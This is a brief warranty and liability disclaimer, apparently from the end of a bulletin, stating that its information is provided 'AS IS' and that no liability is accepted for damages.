DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.